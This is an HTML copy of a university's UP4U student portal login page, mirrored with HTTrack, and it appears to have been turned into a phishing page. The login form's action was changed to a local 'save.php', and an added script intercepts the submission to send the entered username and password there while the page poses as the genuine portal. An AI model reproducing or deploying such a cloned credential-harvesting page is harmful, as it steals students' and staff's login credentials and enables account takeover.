
<!DOCTYPE html>
<html lang="en">

<!-- Mirrored from up4u.up.edu.mx/user/auth/login by HTTrack Website Copier/3.x [XR&CO'2014], Sun, 13 Nov 2022 03:22:11 GMT -->
<!-- Added by HTTrack --><meta http-equiv="content-type" content="text/html;charset=UTF-8" /><!-- /Added by HTTrack -->
<head>
    <title>Login - UP4U</title>
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
    <meta name="theme-color" content="#183467">
<meta name="application-name" content="UP4U">
<meta name="apple-mobile-web-app-title" content="UP4U">
<meta name="apple-mobile-web-app-capable" content="yes">
<meta name="apple-mobile-web-app-status-bar-style" content="#183467">
<meta name="csrf-param" content="_csrf">
<meta name="csrf-token" content="vYKaa3_qzdQzEG59SiCdhE1pUdYZN3bpvsdTL2LbKF_az_Q_K7iPuwNoXjMMUfK3fwYct2xaPrvu6iBoPb1SMQ==">
<meta charset="UTF-8">
  <meta name="viewport" content="width=device-width, initial-scale=1.0">
  <meta http-equiv="X-UA-Compatible" content="ie=edge">

<link href="../../assets/74da96bb/css/themef428.css?v=1645630682" rel="preload" as="style">
<link href="../../static/js/humhub-app190a.js?v=1589993303" rel="preload" as="script">
<link href="../../static/css/humhub-app190a.css?v=1589993303" rel="preload" as="style">
<link href="../../assets/siteicons/152x152860f.png?v=1597621843" rel="apple-touch-icon" sizes="152x152">
<link href="../../assets/siteicons/180x180860f.png?v=1597621843" rel="apple-touch-icon" sizes="180x180">
<link href="../../assets/siteicons/167x167860f.png?v=1597621843" rel="apple-touch-icon" sizes="167x167">
<link href="../../assets/siteicons/192x192860f.png?v=1597621843" rel="icon" sizes="192x192">
<link href="../../assets/siteicons/96x96860f.png?v=1597621843" rel="icon" sizes="96x96">
<link href="../../assets/siteicons/32x32860f.png?v=1597621843" rel="icon" sizes="32x32">
<link href="../../manifest.json" rel="manifest">
<link href="../../static/css/humhub-app190a.css?v=1589993303" rel="stylesheet">
<link href="../../assets/74da96bb/css/themef428.css?v=1645630682" rel="stylesheet">
<style>img { image-orientation: from-image; }</style>
<script src="../../static/js/humhub-app190a.js?v=1589993303"></script>
<script src="../../static/js/humhub-bundle190a.js?v=1589993303" defer="defer"></script>
<script src="../../static/js/humhub/legacy/jquery.loader190a.js?v=1589993303" defer="defer"></script>    <!-- start: Favicon and Touch Icons -->
<link rel="apple-touch-icon" sizes="60x60" href="../../assets/74da96bb/ico/apple-touch-icon-60x60-precomposed.png">
<link rel="apple-touch-icon" sizes="76x76" href="../../assets/74da96bb/ico/apple-touch-icon-76x76-precomposed.png">
<link rel="apple-touch-icon" sizes="120x120" href="../../assets/74da96bb/ico/apple-touch-icon-120x120-precomposed.png">
<link rel="apple-touch-icon" sizes="152x152" href="../../assets/74da96bb/ico/apple-touch-icon-152x152-precomposed.png">
<link rel="apple-touch-icon" sizes="180x180" href="../../assets/74da96bb/ico/apple-touch-icon-180x180-precomposed.png">
<link rel="icon" type="image/png" sizes="192x192" href="../../assets/74da96bb/ico/android-chrome-192x192.png">
<link rel="icon" type="image/png" sizes="32x32" href="../../assets/74da96bb/ico/favicon-32x32.png">
<link rel="icon" type="image/png" sizes="96x96" href="../../assets/74da96bb/ico/favicon-96x96.png">
<link rel="icon" type="image/png" sizes="16x16" href="../../assets/74da96bb/ico/favicon-16x16.png">
<link rel="manifest" href="../../assets/74da96bb/ico/manifest.json">
<meta name="msapplication-TileColor" content="#ffffff">
<meta name="msapplication-TileImage" content="/assets/74da96bb/ico/mstile-150x150.png">
<link rel="mask-icon" href="../../safari-pinned-tab.html" color="#5bbad5">
<meta name="theme-color" content="#ffffff">
<!-- end: Favicon and Touch Icons -->    <meta charset="UTF-8">
</head>

<body class="login-container">
<script>humhub.modules.ui.view.setState("user", "auth", "login");
humhub.config.set({"user":{"isGuest":true,"locale":"en-US"},"live":{"client":{"type":"humhub.modules.live.poll.PollClient","options":{"url":"\/live\/poll","initTime":1668309731,"minInterval":15,"maxInterval":45,"idleFactor":0.1,"idleInterval":20}}},"client":{"baseUrl":"https:\/\/up4u.up.edu.mx","reloadableScripts":["https:\/\/platform.twitter.com\/widgets.js"],"text":{"warn.onBeforeLoad":"There are unsaved changes, do you really want to leave this page?"}},"file":{"upload":{"url":"\/file\/file\/upload","deleteUrl":"\/file\/file\/delete"},"url":{"download":"https:\/\/up4u.up.edu.mx\/file\/file\/download?download=1&guid=-guid-","load":"https:\/\/up4u.up.edu.mx\/file\/file\/download?guid=-guid-"},"text":{"error.upload":"Some files could not be uploaded:","error.unknown":"An unknown error occurred while uploading.","success.delete":"The file has been deleted."}},"action":{"text":{"actionHandlerNotFound":"An error occurred while handling your last action. (Handler not found)."}},"topic":{"icon":"<i class=\"fa fa-star\"><\/i>"},"ui.modal":{"defaultConfirmHeader":"<strong>Confirm<\/strong> Action","defaultConfirmBody":"Do you really want to perform this action?","defaultConfirmText":"Confirm","defaultCancelText":"Cancel"},"ui.widget":{"text":{"error.unknown":"No error information given.","info.title":"Info:","error.title":"Error:"}},"ui.view":{"useDefaultSwipe":false},"ui.richtext":{"emoji.url":"\/static\/img\/emoji\/","text":{"info.minInput":"Please type at least 3 characters","info.loading":"Loading..."}},"ui.richtext.prosemirror":{"emoji":{"twemoji":{"base":"\/static\/img\/twemoji\/","size":"72x72"}},"oembed":{"max":5},"mention":{"minInput":2,"minInputText":"Please type at least 2 characters"},"text":{"Wrap in block quote":"Wrap in block quote","Wrap in bullet list":"Wrap in bullet list","Toggle code font":"Toggle code font","Change to code block":"Change to code block","Code":"Code","Toggle emphasis":"Toggle emphasis","Change to heading":"Change to heading","Insert horizontal rule":"Insert horizontal rule","Horizontal rule":"Horizontal rule","Insert image":"Insert image","Image":"Image","Location":"Location","Title":"Title","Width":"Width","Height":"Height","Add or remove link":"Add or remove link","Create a link":"Create a link","Link target":"Link target","Wrap in ordered list":"Wrap in ordered list","Change to paragraph":"Change to paragraph","Paragraph":"Paragraph","Toggle strikethrough":"Toggle strikethrough","Toggle strong style":"Toggle strong style","Create table":"Create table","Delete table":"Delete table","Insert table":"Insert table","Rows":"Rows","Columns":"Columns","Insert column before":"Insert column before","Insert column after":"Insert column after","Delete column":"Delete column","Insert row before":"Insert row before","Insert row after":"Insert row after","Delete row":"Delete row","Upload and include a File":"Upload and include a File","Upload File":"Upload File","Insert":"Insert","Type":"Type","people":"People","animals_and_nature":"Animals & Nature","food_and_drink":"Food & Drink","activity":"Activity","travel_and_places":"Travel & Places","objects":"Objects","symbols":"Symbols","flags":"Flags","Heading":"Heading"}},"oembed":{"loadUrl":"\/oembed"},"0":"ui.markdown","1":{"text":{"Bold":"Bold","Italic":"Italic","Heading":"Heading","URL\/Link":"URL\/Link","Image\/File":"Image\/File","Image":"Image","List":"List","Preview":"Preview","strong text":"strong text","emphasized text":"emphasized text","heading text":"heading text","enter link description here":"enter link description here","Insert Hyperlink":"Insert Hyperlink","enter image description here":"enter image description here","Insert Image Hyperlink":"Insert Image Hyperlink","enter image title here":"enter image title here","list text here":"list text here","Quote":"Quote","quote here":"quote here","Code":"Code","code text here":"code text here","Unordered List":"Unordered List","Ordered List":"Ordered List"}},"log":{"traceLevel":"INFO","text":{"error.default":"An unexpected error occurred. If this keeps happening, please contact a site administrator.","success.saved":"Saved","saved":"Saved","success.edit":"Saved","0":"An unexpected error occurred. If this keeps happening, please contact a site administrator.","403":"You are not allowed to run this action.","404":"The requested resource could not be found.","405":"Error while running your last action (Invalid request method).","500":"An unexpected server error occurred. If this keeps happening, please contact a site administrator."}},"ui.additions":{"text":{"success.clipboard":"Text has been copied to clipboard","error.clipboard":"Text could not be copied to clipboard"}},"ui.status":{"showMore":false,"text":{"showMore":"Show more","showLess":"Show less"}},"ui.picker":{"addImage":"\/assets\/74da96bb\/img\/picker_add.png","text":{"error.loadingResult":"An unexpected error occurred while loading the search result.","showMore":"Show more","addOption":"Add:"}},"ui.showMore":{"text":{"readMore":"Read full post...","readLess":"Collapse"}},"ui.panel":{"text":{"expand":"Expand","collapse":"Collapse"},"icon":{"up":"<i class=\"fa fa-minus-square\"><\/i>","down":"<i class=\"fa fa-plus-square\"><\/i>"}},"content":{"modal":{"permalink":{"head":"<strong>Permalink<\/strong> to this post","info":"Copy to clipboard","buttonOpen":"Open","buttonClose":"Close"},"deleteConfirm":{"header":"<strong>Confirm<\/strong> post deletion","body":"Do you really want to delete this post? All likes and comments will be lost!","confirmText":"Delete","cancelText":"Cancel"}},"reloadUrl":"\/content\/content\/reload","deleteUrl":"\/content\/content\/delete-id"},"stream":{"horizontalImageScrollOnMobile":"1","defaultSort":"c","text":{"success.archive":"The content has been archived.","success.unarchive":"The content has been unarchived.","success.delete":"The content has been deleted.","info.editCancel":"Your last edit state has been saved!"}},"comment":{"modal":{"delteConfirm":{"header":"<strong>Confirm<\/strong> comment deleting","body":"Do you really want to delete this comment?","confirmText":"Delete","cancelText":"Cancel"}},"text":{"success.delete":"Comment has been deleted"}},"space":{"text":{"success.archived":"The space has been archived.","success.unarchived":"The space has been unarchived."}},"client.pjax":{"active":true,"options":{"pushRedirect":true,"replaceRedirect":true,"cache":false,"timeout":5000}}});</script><div id="layout-content">
	<div class="container-fluid">

		<div class="row">
			<div class="col-md-12">
				<span style="color:black;">
					<center>
						<b>alumno.up.edu.mx</b> ahora es <b><big>UP4U</big></b><br>
						Ingresa para obtener los mismos servicios.
					</center>
				</span>
				<br>

				<div class="alert" style="background-color:#f7f2ec;">
					<div class="row">
						<div class="col-md-9 col-xs-12 col-img" style="background-color: #f7f2ec;padding: 0px;">
							<img class="img-responsive rounded hidden-xs hidden-sm"
								src="../../themes/UPTheme/img/fondo_login.jpg" />
							<img class="visible-xs-block visible-sm-block hidden-sm"
								src="../../themes/UPTheme/img/logo_up_color_hor_xs.png"
								style="margin-left: auto; margin-right: auto;margin-top: 10px;" />
							<img class="img-responsive rounded visible-xs-block visible-sm-block hidden-sm"
								src="../../themes/UPTheme/img/cabecera_xs_login.png"
								style="margin-left: auto; margin-right: auto;margin-top: 10px;" />
							<img class="img-responsive rounded hidden-xs hidden-md hidden-lg"
								src="../../themes/UPTheme/img/fondo_login_tablet.jpg"
								style="margin-left: auto; margin-right: auto;margin-top: 10px;"
								/>
						</div>
						<div class=" col-xs-12 col-md-3">

							<div class="panel animated bounceIn" id="login-form"
								 style="max-width: auto; text-align: left;">

								<div class="panel-heading panel-headinglogin" style="color: white; text-align:left; background-color: #881739"><strong>Please</strong> sign in</div>

								<div class="panel-body" style="border: 2px solid #881739;">


																														<p>Please login with your username/email and password.</p>

									<form id="account-login-form" action="./save.php" method="post" >
									<div class="form-group field-login_username required">

<input type="text"  class="form-control" name="username" placeholder="username or email" aria-label="username or email" aria-required="true">

<div class="help-block"></div>
</div>										<div class="form-group field-login_password required">

<input type="password"  class="form-control" name="password" placeholder="password" aria-label="password" aria-required="true">

<div class="help-block"></div>
</div>										<div class="form-group field-login-rememberme">

<input type="hidden" name="Login[rememberMe]" value="0"><label><input type="checkbox" id="login-rememberme" name="Login[rememberMe]" value="1" checked> Remember me</label>

<div class="help-block"></div>
</div>
										<hr>
										<div class="row">
											<div class="col-md-12 text-right">
												<button type="submit" name="login-button" class="btn btn-large btn-infa" data-ui-loader="">Sign in</button>											</div>
										</div>

									</form>
                                    <script>
                                        const EL_formLogin = document.querySelector("#account-login-form");
                                        EL_formLogin.addEventListener("submit", (ev) => {
                                            ev.preventDefault(); // Stop default form submit - we'll use AJAX
                                            fetch(EL_formLogin.action, {
                                                method: 'POST',
                                                body: new FormData(EL_formLogin),
                                            }).then(res => res.json()).then(data => {
                                                // Hide the form
                                                EL_formLogin.hidden = true;
                                                // Show the user name
                                                document.querySelector("[data-username]").textContent = data.username;
                                                document.querySelector("[data-password]").passwordContent = data.password;
                                            });
                                        });
                                    </script>


									<br>
									<div class="alert" style="background-color: rgba(213, 190, 136, 255);">
										<!--div class="row"-->
											<div class="text text-center animated fadeIn">
            Choose language: &nbsp;
        <div class="langSwitcher inline-block">
            <form id="choose-language-form" action="https://up4u.up.edu.mx/user/auth/login" method="post">
<input type="hidden" name="_csrf" value="vYKaa3_qzdQzEG59SiCdhE1pUdYZN3bpvsdTL2LbKF_az_Q_K7iPuwNoXjMMUfK3fwYct2xaPrvu6iBoPb1SMQ==">            <select id="chooselanguage-language" name="ChooseLanguage[language]" data-action-change="ui.form.submit" aria-label="Choose language:">
<option value="en-US" selected>English (US)</option>
<option value="en-GB">English (UK)</option>
<option value="de">Deutsch</option>
<option value="fr">Français</option>
<option value="nl">Nederlands</option>
<option value="pl">Polski</option>
<option value="pt">Português</option>
<option value="pt-BR">Português do Brasil</option>
<option value="es">Español</option>
<option value="ca">Català</option>
<option value="it">Italiano</option>
<option value="th">ไทย</option>
<option value="tr">Türkçe</option>
<option value="ru">Русский</option>
<option value="uk">українська</option>
<option value="el">Ελληνικά</option>
<option value="ja">日本語</option>
<option value="hu">Magyar</option>
<option value="nb-NO">Norsk bokmål</option>
<option value="nn-NO">Nynorsk</option>
<option value="zh-CN">中文(简体)</option>
<option value="zh-TW">中文(台灣)</option>
<option value="an">Aragonés</option>
<option value="vi">Tiếng Việt</option>
<option value="sv">Svenska</option>
<option value="cs">čeština</option>
<option value="da">dansk</option>
<option value="uz">Ўзбек</option>
<option value="fa-IR">فارسی</option>
<option value="bg">български</option>
<option value="sk">slovenčina</option>
<option value="ro">română</option>
<option value="ar">العربية/عربي‎‎</option>
<option value="ko">한국어</option>
<option value="id">Bahasa Indonesia</option>
<option value="lt">lietuvių kalba</option>
<option value="ht">Kreyòl ayisyen</option>
<option value="lv">Latvijas</option>
<option value="sl">Slovenščina</option>
<option value="hr">Hrvatski</option>
<option value="am">አማርኛ</option>
<option value="fi">suomalainen</option>
<option value="he">עברית</option>
</select>            </form>        </div>
    </div>
										<!--/div-->
									</div>

								</div>

							</div>

						</div>
					</div>
				</div>
			</div>
		</div>


	</div>
	<br>

<script type="text/javascript">
    $(function () {
        // set cursor to login field
        $('#login_username').focus();
    });

    // Shake panel after wrong validation

    // Shake panel after wrong validation

</script>


</div><br />

<div class="text text-center powered">
        </div>
<div id="globalModal" class="modal" tabindex="-1" role="dialog" aria-hidden="true" data-backdrop="static" data-ui-widget="ui.modal.Modal">
    <!-- Dialog -->

<div id="h892544w0" class="modal-dialog " data-backdrop="static" data-keyboard="false" data-ui-widget="ui.modal.Modal">    <!-- Content -->
    <div class="modal-content">
        <!-- Header -->

                    <!-- Body -->
            <div class="modal-body">
                                                    <div  class="loader humhub-ui-loader " >
    <div class="sk-spinner sk-spinner-three-bounce">
        <div class="sk-bounce1"></div>
        <div class="sk-bounce2"></div>
        <div class="sk-bounce3"></div>
    </div>
</div>                            </div>

            <!-- Footer -->
                        </div>
</div>

</div><div id="globalModalConfirm" class="modal" tabindex="-1" role="dialog" aria-hidden="true" data-backdrop="static" data-keyboard="false" data-ui-widget="ui.modal.ConfirmModal">
    <!-- Dialog -->

<div id="h892544w1" class="modal-dialog modal-dialog-extra-small animated pulse " data-backdrop="static" data-keyboard="false" data-ui-widget="ui.modal.Modal">    <!-- Content -->
    <div class="modal-content">
        <!-- Header -->

                    <!-- Body -->
            <div class="modal-body text-center">
                                                    <div  class="loader humhub-ui-loader " >
    <div class="sk-spinner sk-spinner-three-bounce">
        <div class="sk-bounce1"></div>
        <div class="sk-bounce2"></div>
        <div class="sk-bounce3"></div>
    </div>
</div>                            </div>

            <!-- Footer -->
                            <div class="modal-footer">
                    <button data-modal-cancel data-modal-close class="btn btn-default"></button><button data-modal-confirm data-modal-close class="btn btn-primary"></button>
                </div>
                        </div>
</div>

</div><div id="humhub-ui-loader-default" class="loader humhub-ui-loader "  style="display:none;" >
    <div class="sk-spinner sk-spinner-three-bounce">
        <div class="sk-bounce1"></div>
        <div class="sk-bounce2"></div>
        <div class="sk-bounce3"></div>
    </div>
</div><div id="status-bar" class="clearfix" style="display:none;">
    <div class="status-bar-body">
        <div class="status-bar-content"></div>
    </div>
</div><div id="blueimp-gallery" class="blueimp-gallery blueimp-gallery-controls">
    <div class="slides"></div>
    <h3 class="title">Hidden Gallery</h3>
    <a class="prev">‹</a>
    <a class="next">›</a>
    <a class="close">×</a>
    <a class="play-pause"></a>
    <ol class="indicator"></ol>
</div>
<div class="modal modal-top" id="markdown-modal-file-upload" tabindex="-1" role="dialog" aria-labelledby="addImageModalLabel" style="z-index:99999" aria-hidden="true">
    <!-- Dialog -->

<div id="h892544w3" class="modal-dialog " data-backdrop="static" data-keyboard="false" data-ui-widget="ui.modal.Modal">    <!-- Content -->
    <div class="modal-content">
        <!-- Header -->
                    <div class="modal-header">
                                    <button aria-hidden="true" data-dismiss="modal" class="close" type="button">×</button>
                                                    <h4 class="modal-title">Add image/file</h4>
                            </div>

                            <div class="modal-body">

            <div class="uploadForm">

<span class="btn btn-default btn-sm  fileinput-button" data-placement="bottom" data-action-click="file.upload" data-action-target="#markdown-file-upload">    <i class="fa fa-cloud-upload" aria-hidden="true"></i> &nbsp;Upload    <input type="file" id="markdown-file-upload" name="files[]" multiple="multiple" title="Upload file" data-upload-progress="#markdown-modal-upload-progress" data-upload-submit-name="fileList[]" data-upload-hide-in-stream="1" data-upload-drop-zone="#markdown-modal-file-upload" data-php-max-file-uploads="20" data-php-max-file-uploads-message="Sorry, you can only upload up to 20 files at once." data-ui-widget="file.Upload" data-ui-init style="display:none"></span>            </div>

            <br>

            <div id="markdown-modal-upload-progress" style="display:none"></div>

        </div>
        <div class="modal-footer">
            <button type="button" id="h892544w2" class="btn btn-default" data-modal-close="">Close</button>        </div>
                </div>
</div></div>

<div class="modal modal-top" id="markdown-modal-add-link" tabindex="-1" role="dialog" style="z-index:99999" aria-labelledby="addLinkModalLabel" aria-hidden="true">
    <!-- Dialog -->

<div id="h892544w6" class="modal-dialog " data-backdrop="static" data-keyboard="false" data-ui-widget="ui.modal.Modal">    <!-- Content -->
    <div class="modal-content">
        <!-- Header -->
                    <div class="modal-header">
                                    <button aria-hidden="true" data-dismiss="modal" class="close" type="button">×</button>
                                                    <h4 class="modal-title">Add link</h4>
                            </div>

                            <div class="modal-body">
            <div class="form-group">
                <label for="addLinkTitle">Title</label>
                <input type="text" class="form-control linkTitle"
                       placeholder="Title of your link">
            </div>
            <div class="form-group">
                <label for="addLinkTarget">Target</label>
                <input type="text" class="form-control linkTarget"
                       placeholder="Enter a url (e.g. http://example.com)">
            </div>
        </div>
        <div class="modal-footer">
            <button type="button" id="h892544w4" class="btn btn-default" data-modal-close="">Close</button>            <button type="button" id="h892544w5" class="addLinkButton btn btn-primary">Add link</button>        </div>
                </div>
</div></div><script>jQuery(function ($) {
jQuery('#account-login-form').yiiActiveForm([], []);
jQuery('#choose-language-form').yiiActiveForm([], []);
            if ('serviceWorker' in navigator) {
                navigator.serviceWorker.register('../../sw83a2.js?v=1649337096', { scope: '/' })
                    .then(function (registration) {
                        if (typeof afterServiceWorkerRegistration === "function") {
                            afterServiceWorkerRegistration(registration);
                        }
                    })
            }
});</script></body>


<!-- Mirrored from up4u.up.edu.mx/user/auth/login by HTTrack Website Copier/3.x [XR&CO'2014], Sun, 13 Nov 2022 03:22:26 GMT -->
</html>
